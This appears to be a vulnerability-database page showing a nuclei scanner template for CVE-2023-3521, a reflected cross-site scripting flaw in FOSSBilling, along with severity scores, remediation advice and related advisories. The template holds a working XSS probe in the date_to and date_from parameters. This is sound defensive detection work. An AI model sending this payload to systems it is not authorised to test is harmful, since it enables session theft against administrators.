Lucene search
K

FOSSBilling < 0.5.3 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

FOSSBilling < 0.5.3 - Cross-Site Scripting (XSS) - Reflected in GitHub repository prior to 0.5.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Reflected XSS in date
1 Jul 202303:22
huntr
Circl
CVE-2023-3521
6 Jul 202307:32
circl
CNNVD
fossbilling 跨站脚本漏洞
6 Jul 202300:00
cnnvd
CVE
CVE-2023-3521
6 Jul 202301:45
cve
Cvelist
CVE-2023-3521 Cross-site Scripting (XSS) - Reflected in fossbilling/fossbilling
6 Jul 202301:45
cvelist
EUVD
EUVD-2023-44178
3 Oct 202520:07
euvd
NVD
CVE-2023-3521
6 Jul 202302:15
nvd
OSV
CVE-2023-3521 Cross-site Scripting (XSS) - Reflected in fossbilling/fossbilling
6 Jul 202301:45
osv
Prion
Cross site scripting
6 Jul 202302:15
prion
RedhatCVE
CVE-2023-3521
23 May 202503:29
redhatcve
Rows per page
id: CVE-2023-3521

info:
  name: FOSSBilling < 0.5.3 - Cross-Site Scripting
  author: ctflearner
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository fossbilling/fossbilling prior to 0.5.4.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through date_to and date_from parameters to steal FOSSBilling administrator session cookies and access sensitive billing and customer data.
  remediation: |
    Update FOSSBilling to version 0.5.4 or later that properly sanitizes date parameters in the admin interface and encodes output to prevent reflected XSS attacks.
  reference:
    - https://huntr.com/bounties/76a3441d-7f75-4a8d-a7a0-95a7f5456eb0
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3521
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3521
    cwe-id: CWE-79
    epss-score: 0.00919
    epss-percentile: 0.55939
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="FOSSBilling"
    product: fossbilling
  tags: cve2023,cve,fossbilling,xss,vuln

http:
  - raw:
      - |
        GET /admin?_url=%2Fadmin&date_to='"><img+src=x+onerror=alert(3)>&date_from='"><img+src=x+onerror=alert(3)> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert(3)>"
          - "FOSSBilling"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022007a87d09cacab546a8ea7f85e19d5ede3a06073f719f7e271df63e88f01c881e022100a67d08c51a2d7360d2de0e0b25f766d68d5731478c88b2b26b91bdc5e2dc144b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.1
CVSS 35.4
EPSS0.00919
SSVC
25